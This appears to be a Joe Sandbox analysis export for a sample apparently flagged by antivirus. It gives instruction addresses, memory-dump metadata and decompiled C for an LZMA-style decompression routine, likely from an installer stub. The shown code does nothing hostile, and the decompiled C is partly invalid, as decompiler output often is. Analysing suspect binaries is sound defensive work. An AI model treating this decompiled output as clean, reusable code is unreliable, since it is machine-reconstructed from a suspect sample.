                                                                        0x00406f30
                                                                        0x00406f33
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00406f33
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f75
                                                                        0x00406f75
                                                                        0x00406f79
                                                                        0x00407581
                                                                        0x00000000
                                                                        0x00407581
                                                                        0x00406f7f
                                                                        0x00406f82
                                                                        0x00406f85
                                                                        0x00406f89
                                                                        0x00406f8c
                                                                        0x00406f92
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f97
                                                                        0x00406f9a
                                                                        0x00406f9a
                                                                        0x00406fa0
                                                                        0x00406f3e
                                                                        0x00406f3e
                                                                        0x00406f41
                                                                        0x00000000
                                                                        0x00406f41
                                                                        0x00406fa2
                                                                        0x00406fa2
                                                                        0x00406fa5
                                                                        0x00406fa8
                                                                        0x00406fab
                                                                        0x00406fae
                                                                        0x00406fb1
                                                                        0x00406fb4
                                                                        0x00406fb7
                                                                        0x00406fba
                                                                        0x00406fbd
                                                                        0x00406fc0
                                                                        0x00406fd8
                                                                        0x00406fdb
                                                                        0x00406fde
                                                                        0x00406fe1
                                                                        0x00406fe1
                                                                        0x00406fe4
                                                                        0x00406fe8
                                                                        0x00406fea
                                                                        0x00406fc2
                                                                        0x00406fc2
                                                                        0x00406fca
                                                                        0x00406fcf
                                                                        0x00406fd1
                                                                        0x00406fd3
                                                                        0x00406fd3
                                                                        0x00406fed
                                                                        0x00406ff4
                                                                        0x00406ff7
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00407286
                                                                        0x00407286
                                                                        0x0040728a
                                                                        0x004075b1
                                                                        0x00000000
                                                                        0x004075b1
                                                                        0x00407290
                                                                        0x00407293
                                                                        0x00407296
                                                                        0x0040729a
                                                                        0x0040729d
                                                                        0x004072a3
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407056
                                                                        0x00407056
                                                                        0x00407059
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407395
                                                                        0x00407399
                                                                        0x004073bb
                                                                        0x004073be
                                                                        0x004073c8
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x0040739b
                                                                        0x0040739e
                                                                        0x004073a2
                                                                        0x004073a5
                                                                        0x004073a5
                                                                        0x004073a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407452
                                                                        0x00407456
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x0040747b
                                                                        0x00407482
                                                                        0x00407489
                                                                        0x00407489
                                                                        0x00000000
                                                                        0x00407489
                                                                        0x00407458
                                                                        0x0040745b
                                                                        0x0040745e
                                                                        0x00407461
                                                                        0x00407468
                                                                        0x004073ac
                                                                        0x004073ac
                                                                        0x004073af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407543
                                                                        0x00407546
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040717d
                                                                        0x0040717f
                                                                        0x00407186
                                                                        0x00407187
                                                                        0x00407189
                                                                        0x0040718c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407194
                                                                        0x00407197
                                                                        0x0040719a
                                                                        0x0040719c
                                                                        0x0040719e
                                                                        0x0040719e
                                                                        0x0040719f
                                                                        0x004071a2
                                                                        0x004071a9
                                                                        0x004071ac
                                                                        0x004071ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407490
                                                                        0x00407490
                                                                        0x00407493
                                                                        0x0040749a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040749f
                                                                        0x0040749f
                                                                        0x004074a3
                                                                        0x004075db
                                                                        0x00000000
                                                                        0x004075db
                                                                        0x004074a9
                                                                        0x004074ac
                                                                        0x004074af
                                                                        0x004074b3
                                                                        0x004074b6
                                                                        0x004074bc
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074c1
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c7
                                                                        0x004074c7
                                                                        0x004074cb
                                                                        0x0040752b
                                                                        0x0040752e
                                                                        0x00407533
                                                                        0x00407534
                                                                        0x00407536
                                                                        0x00407538
                                                                        0x0040753b
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x00407447
                                                                        0x004074cd
                                                                        0x004074d3
                                                                        0x004074d6
                                                                        0x004074d9
                                                                        0x004074dc
                                                                        0x004074df
                                                                        0x004074e2
                                                                        0x004074e5
                                                                        0x004074e8
                                                                        0x004074eb
                                                                        0x004074ee
                                                                        0x00407507
                                                                        0x0040750a
                                                                        0x0040750d
                                                                        0x00407510
                                                                        0x00407514
                                                                        0x00407516
                                                                        0x00407516
                                                                        0x00407517
                                                                        0x0040751a
                                                                        0x004074f0
                                                                        0x004074f0
                                                                        0x004074f8
                                                                        0x004074fd
                                                                        0x004074ff
                                                                        0x00407502
                                                                        0x00407502
                                                                        0x0040751d
                                                                        0x00407524
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x004071c2
                                                                        0x004071c5
                                                                        0x004071fb
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732e
                                                                        0x0040732e
                                                                        0x00407331
                                                                        0x00407333
                                                                        0x004075bd
                                                                        0x00000000
                                                                        0x004075bd
                                                                        0x00407339
                                                                        0x0040733c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407342
                                                                        0x00407346
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00000000
                                                                        0x00407349
                                                                        0x004071c7
                                                                        0x004071c9
                                                                        0x004071cb
                                                                        0x004071cd
                                                                        0x004071d0
                                                                        0x004071d1
                                                                        0x004071d3
                                                                        0x004071d5
                                                                        0x004071d8
                                                                        0x004071db
                                                                        0x004071f1
                                                                        0x004071f6
                                                                        0x0040722e
                                                                        0x0040722e
                                                                        0x00407232
                                                                        0x0040725e
                                                                        0x00407260
                                                                        0x00407267
                                                                        0x0040726a
                                                                        0x0040726d
                                                                        0x0040726d
                                                                        0x00407272
                                                                        0x00407272
                                                                        0x00407274
                                                                        0x00407277
                                                                        0x0040727e
                                                                        0x00407281
                                                                        0x004072ae
                                                                        0x004072ae
                                                                        0x004072b1
                                                                        0x004072b4
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00000000
                                                                        0x00407328
                                                                        0x004072b6
                                                                        0x004072bc
                                                                        0x004072bf
                                                                        0x004072c2
                                                                        0x004072c5
                                                                        0x004072c8
                                                                        0x004072cb
                                                                        0x004072ce
                                                                        0x004072d1
                                                                        0x004072d4
                                                                        0x004072d7
                                                                        0x004072f0
                                                                        0x004072f2
                                                                        0x004072f5
                                                                        0x004072f6
                                                                        0x004072f9
                                                                        0x004072fb
                                                                        0x004072fe
                                                                        0x00407300
                                                                        0x00407302
                                                                        0x00407305
                                                                        0x00407307
                                                                        0x0040730a
                                                                        0x0040730e
                                                                        0x00407310
                                                                        0x00407310
                                                                        0x00407311
                                                                        0x00407314
                                                                        0x00407317
                                                                        0x004072d9
                                                                        0x004072d9
                                                                        0x004072e1
                                                                        0x004072e6
                                                                        0x004072e8
                                                                        0x004072eb
                                                                        0x004072eb
                                                                        0x0040731a
                                                                        0x00407321
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00407321
                                                                        0x00407234
                                                                        0x00407237
                                                                        0x00407239
                                                                        0x0040723c
                                                                        0x0040723f
                                                                        0x00407242
                                                                        0x00407244
                                                                        0x00407247
                                                                        0x0040724a
                                                                        0x0040724a
                                                                        0x0040724d
                                                                        0x0040724d
                                                                        0x00407250
                                                                        0x00407257
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00407257
                                                                        0x004071dd
                                                                        0x004071e0
                                                                        0x004071e2
                                                                        0x004071e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f44
                                                                        0x00406f44
                                                                        0x00406f48
                                                                        0x0040758d
                                                                        0x00000000
                                                                        0x0040758d
                                                                        0x00406f4e
                                                                        0x00406f51
                                                                        0x00406f54
                                                                        0x00406f57
                                                                        0x00406f5a
                                                                        0x00406f5d
                                                                        0x00406f60
                                                                        0x00406f62
                                                                        0x00406f65
                                                                        0x00406f68
                                                                        0x00406f6b
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070cf
                                                                        0x004070cf
                                                                        0x004070d3
                                                                        0x00407599
                                                                        0x00000000
                                                                        0x00407599
                                                                        0x004070d9
                                                                        0x004070dc
                                                                        0x004070df
                                                                        0x004070e2
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e7
                                                                        0x004070ea
                                                                        0x004070ed
                                                                        0x004070f0
                                                                        0x004070f3
                                                                        0x004070f6
                                                                        0x004070f7
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070fc
                                                                        0x004070ff
                                                                        0x00407102
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407108
                                                                        0x0040710a
                                                                        0x0040710a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x00407350
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407356
                                                                        0x00407359
                                                                        0x0040735c
                                                                        0x0040735f
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407364
                                                                        0x00407367
                                                                        0x0040736a
                                                                        0x0040736d
                                                                        0x00407370
                                                                        0x00407373
                                                                        0x00407374
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407379
                                                                        0x0040737c
                                                                        0x0040737f
                                                                        0x00407382
                                                                        0x00407385
                                                                        0x00407389
                                                                        0x0040738b
                                                                        0x0040738e
                                                                        0x00000000
                                                                        0x00407390
                                                                        0x0040710d
                                                                        0x0040710d
                                                                        0x00000000
                                                                        0x0040710d
                                                                        0x0040738e
                                                                        0x004075c3
                                                                        0x004075e5
                                                                        0x004075eb
                                                                        0x004075ed
                                                                        0x004075f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x004075fa
                                                                        0x004075fa
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                        • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                        • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                        • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E00406FFE() {
                                                                        				signed int _t539;
                                                                        				unsigned short _t540;
                                                                        				signed int _t541;
                                                                        				void _t542;
                                                                        				signed int _t543;
                                                                        				signed int _t544;
                                                                        				signed int _t573;
                                                                        				signed int _t576;
                                                                        				signed int _t597;
                                                                        				signed int* _t614;
                                                                        				void* _t621;
                                                                        
                                                                        				L0:
                                                                        				while(1) {
                                                                        					L0:
                                                                        					if( *(_t621 - 0x40) != 1) {
                                                                        						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                        						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                        						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                        						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                        						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                        						_t539 =  *(_t621 - 4) + 0x664;
                                                                        						 *(_t621 - 0x58) = _t539;
                                                                        						goto L68;
                                                                        					} else {
                                                                        						 *(__ebp - 0x84) = 8;
                                                                        						while(1) {
                                                                        							L132:
                                                                        							 *(_t621 - 0x54) = _t614;
                                                                        							while(1) {
                                                                        								L133:
                                                                        								_t540 =  *_t614;
                                                                        								_t597 = _t540 & 0x0000ffff;
                                                                        								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                        								if( *(_t621 - 0xc) >= _t573) {
                                                                        									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                        									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                        									 *(_t621 - 0x40) = 1;
                                                                        									_t541 = _t540 - (_t540 >> 5);
                                                                        									 *_t614 = _t541;
                                                                        								} else {
                                                                        									 *(_t621 - 0x10) = _t573;
                                                                        									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                        									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                        								}
                                                                        								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                        									goto L139;
                                                                        								}
                                                                        								L137:
                                                                        								if( *(_t621 - 0x6c) == 0) {
                                                                        									 *(_t621 - 0x88) = 5;
                                                                        									L170:
                                                                        									_t576 = 0x22;
                                                                        									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                        									_t544 = 0;
                                                                        									L172:
                                                                        									return _t544;
                                                                        								}
                                                                        								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                        								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                        								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                        								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                        								L139:
                                                                        								_t542 =  *(_t621 - 0x84);
                                                                        								while(1) {
                                                                        									 *(_t621 - 0x88) = _t542;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t543 =  *(_t621 - 0x88);
                                                                        										if(_t543 > 0x1c) {
                                                                        											break;
                                                                        										}
                                                                        										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                                        											case 0:
                                                                        												if( *(_t621 - 0x6c) == 0) {
                                                                        													goto L170;
                                                                        												}
                                                                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                        												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                        												_t543 =  *( *(_t621 - 0x70));
                                                                        												if(_t543 > 0xe1) {
                                                                        													goto L171;
                                                                        												}
                                                                        												_t547 = _t543 & 0x000000ff;
                                                                        												_push(0x2d);
                                                                        												asm("cdq");
                                                                        												_pop(_t578);
                                                                        												_push(9);
                                                                        												_pop(_t579);
                                                                        												_t617 = _t547 / _t578;
                                                                        												_t549 = _t547 % _t578 & 0x000000ff;
                                                                        												asm("cdq");
                                                                        												_t612 = _t549 % _t579 & 0x000000ff;
                                                                        												 *(_t621 - 0x3c) = _t612;
                                                                        												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                        												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                        												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                        												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                        													L10:
                                                                        													if(_t620 == 0) {
                                                                        														L12:
                                                                        														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                        														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                        														goto L15;
                                                                        													} else {
                                                                        														goto L11;
                                                                        													}
                                                                        													do {
                                                                        														L11:
                                                                        														_t620 = _t620 - 1;
                                                                        														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                        													} while (_t620 != 0);
                                                                        													goto L12;
                                                                        												}
                                                                        												if( *(_t621 - 4) != 0) {
                                                                        													GlobalFree( *(_t621 - 4));
                                                                        												}
                                                                        												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                        												 *(_t621 - 4) = _t543;
                                                                        												if(_t543 == 0) {
                                                                        													goto L171;
                                                                        												} else {
                                                                        													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                        													goto L10;
                                                                        												}
                                                                        											case 1:
                                                                        												L13:
                                                                        												__eflags =  *(_t621 - 0x6c);
                                                                        												if( *(_t621 - 0x6c) == 0) {
                                                                        													 *(_t621 - 0x88) = 1;
                                                                        													goto L170;
                                                                        												}
                                                                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                        												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                        												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                        												_t45 = _t621 - 0x48;
                                                                        												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                        												__eflags =  *_t45;
                                                                        												L15:
                                                                        												if( *(_t621 - 0x48) < 4) {
                                                                        													goto L13;
                                                                        												}
                                                                        												_t555 =  *(_t621 - 0x40);
                                                                        												if(_t555 ==  *(_t621 - 0x74)) {
                                                                        													L20:
                                                                        													 *(_t621 - 0x48) = 5;
                                                                        													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                        													goto L23;
                                                                        												}
                                                                        												 *(_t621 - 0x74) = _t555;
                                                                        												if( *(_t621 - 8) != 0) {
                                                                        													GlobalFree( *(_t621 - 8));
                                                                        												}
                                                                        												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                        												 *(_t621 - 8) = _t543;
                                                                        												if(_t543 == 0) {
                                                                        													goto L171;
                                                                        												} else {
                                                                        													goto L20;
                                                                        												}
                                                                        											case 2:
                                                                        												L24:
                                                                        												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                        												 *(_t621 - 0x84) = 6;
                                                                        												 *(_t621 - 0x4c) = _t562;
                                                                        												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                        												goto L132;
                                                                        											case 3:
                                                                        												L21:
                                                                        												__eflags =  *(_t621 - 0x6c);
                                                                        												if( *(_t621 - 0x6c) == 0) {
                                                                        													 *(_t621 - 0x88) = 3;
                                                                        													goto L170;
                                                                        												}
                                                                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                        												_t67 = _t621 - 0x70;
                                                                        												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                        												__eflags =  *_t67;
                                                                        												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                        												L23:
                                                                        												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                        												if( *(_t621 - 0x48) != 0) {
                                                                        													goto L21;
                                                                        												}
                                                                        												goto L24;
                                                                        											case 4:
                                                                        												L133:
                                                                        												_t540 =  *_t614;
                                                                        												_t597 = _t540 & 0x0000ffff;
                                                                        												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                        												if( *(_t621 - 0xc) >= _t573) {
                                                                        													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                        													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                        													 *(_t621 - 0x40) = 1;
                                                                        													_t541 = _t540 - (_t540 >> 5);
                                                                        													 *_t614 = _t541;
                                                                        												} else {
                                                                        													 *(_t621 - 0x10) = _t573;
                                                                        													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                        													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                        												}
                                                                        												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                        													goto L139;
                                                                        												}
                                                                        											case 5:
                                                                        												goto L137;
                                                                        											case 6:
                                                                        												__edx = 0;
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													__eax =  *(__ebp - 4);
                                                                        													__ecx =  *(__ebp - 0x38);
                                                                        													 *(__ebp - 0x34) = 1;
                                                                        													 *(__ebp - 0x84) = 7;
                                                                        													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                        													L132:
                                                                        													 *(_t621 - 0x54) = _t614;
                                                                        													goto L133;
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                        												__esi =  *(__ebp - 0x60);
                                                                        												__cl = 8;
                                                                        												__cl = 8 -  *(__ebp - 0x3c);
                                                                        												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                        												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                        												__ecx =  *(__ebp - 0x3c);
                                                                        												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                        												__ecx =  *(__ebp - 4);
                                                                        												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                        												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                        												__eflags =  *(__ebp - 0x38) - 4;
                                                                        												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        												if( *(__ebp - 0x38) >= 4) {
                                                                        													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                        													if( *(__ebp - 0x38) >= 0xa) {
                                                                        														_t98 = __ebp - 0x38;
                                                                        														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                        														__eflags =  *_t98;
                                                                        													} else {
                                                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                        													}
                                                                        												} else {
                                                                        													 *(__ebp - 0x38) = 0;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x34) - __edx;
                                                                        												if( *(__ebp - 0x34) == __edx) {
                                                                        													__ebx = 0;
                                                                        													__ebx = 1;
                                                                        													goto L61;
                                                                        												} else {
                                                                        													__eax =  *(__ebp - 0x14);
                                                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        													__eflags = __eax -  *(__ebp - 0x74);
                                                                        													if(__eax >=  *(__ebp - 0x74)) {
                                                                        														__eax = __eax +  *(__ebp - 0x74);
                                                                        														__eflags = __eax;
                                                                        													}
                                                                        													__ecx =  *(__ebp - 8);
                                                                        													__ebx = 0;
                                                                        													__ebx = 1;
                                                                        													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                        													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                        													goto L41;
                                                                        												}
                                                                        											case 7:
                                                                        												goto L0;
                                                                        											case 8:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													__eax =  *(__ebp - 4);
                                                                        													__ecx =  *(__ebp - 0x38);
                                                                        													 *(__ebp - 0x84) = 0xa;
                                                                        													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                        												} else {
                                                                        													__eax =  *(__ebp - 0x38);
                                                                        													__ecx =  *(__ebp - 4);
                                                                        													__eax =  *(__ebp - 0x38) + 0xf;
                                                                        													 *(__ebp - 0x84) = 9;
                                                                        													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                        													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                        												}
                                                                        												while(1) {
                                                                        													L132:
                                                                        													 *(_t621 - 0x54) = _t614;
                                                                        													goto L133;
                                                                        												}
                                                                        											case 9:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													goto L89;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x60);
                                                                        												if( *(__ebp - 0x60) == 0) {
                                                                        													goto L171;
                                                                        												}
                                                                        												__eax = 0;
                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                        												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                        												__eflags = _t258;
                                                                        												0 | _t258 = _t258 + _t258 + 9;
                                                                        												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                        												goto L75;
                                                                        											case 0xa:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													__eax =  *(__ebp - 4);
                                                                        													__ecx =  *(__ebp - 0x38);
                                                                        													 *(__ebp - 0x84) = 0xb;
                                                                        													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                        													while(1) {
                                                                        														L132:
                                                                        														 *(_t621 - 0x54) = _t614;
                                                                        														goto L133;
                                                                        													}
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x28);
                                                                        												goto L88;
                                                                        											case 0xb:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													__ecx =  *(__ebp - 0x24);
                                                                        													__eax =  *(__ebp - 0x20);
                                                                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        												} else {
                                                                        													__eax =  *(__ebp - 0x24);
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x28);
                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        												L88:
                                                                        												__ecx =  *(__ebp - 0x2c);
                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        												L89:
                                                                        												__eax =  *(__ebp - 4);
                                                                        												 *(__ebp - 0x80) = 0x15;
                                                                        												__eax =  *(__ebp - 4) + 0xa68;
                                                                        												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                        												goto L68;
                                                                        											case 0xc:
                                                                        												L99:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0xc;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t334 = __ebp - 0x70;
